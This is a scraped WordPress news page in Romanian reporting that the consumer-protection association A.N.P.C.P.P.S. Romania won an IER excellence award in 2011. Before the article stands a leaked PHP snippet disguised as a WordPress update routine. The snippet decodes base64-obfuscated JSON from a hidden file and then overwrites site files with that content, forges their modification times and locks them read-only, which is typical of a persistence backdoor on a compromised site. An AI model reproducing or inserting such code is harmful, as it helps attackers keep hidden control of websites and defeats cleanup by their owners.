$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } A.N.P.C.P.P.S. Romania, premiul de excelenta cu o9atitudine! – O noua atitudine

Cu aceasta ocazie a avut loc si decernarea “Premiilor de excelenta IER”, ceremonie
aflata la cea de-a doua editie. Anul 2011 a fost declarat Anul European al Voluntariatului si IER si-a indreptat atentia catre societatea civila reprezentata de organizatiile nonguvernamentale.
Din cele peste 60 de ONG-uri selectate initial, au ramas doar 14 care au fost premiate, pe baza unor criterii cum ar fi: vizibilitate pe piata, credibilitatea in randul cetatenilor si programele desfasurate de-a lungul anului 2011.
Printre acestea 14 asociatii premiate s-a regasit si Asociatia Nationala pentru Protectia consumatorilor si Promovarea Programelor din Romania. A.N.P.C.P.P.S. Romania a primit premiul de excelenta pentru “contributia la promovarea spiritului si valorilor europene”.
    Pe acesta cale, A.N.P.C.P.P.S. Romania vrea sa multumeasca tuturor membrilor, sutinatorilor dar si reprezentantiilor media care i-a ajutat in promovarea programelor pe care Asociatia le are in desfasurare!
        Pentru mai multe informatii privind programele noastre de protectia consumatorilor, viziteaza acum pagina noastra de Facebook “ Asociatia Nationala pentru Protectia Consumatorilor o9atitudine” sau site-ul www.protectia-consumatorilor.ro

By o9admin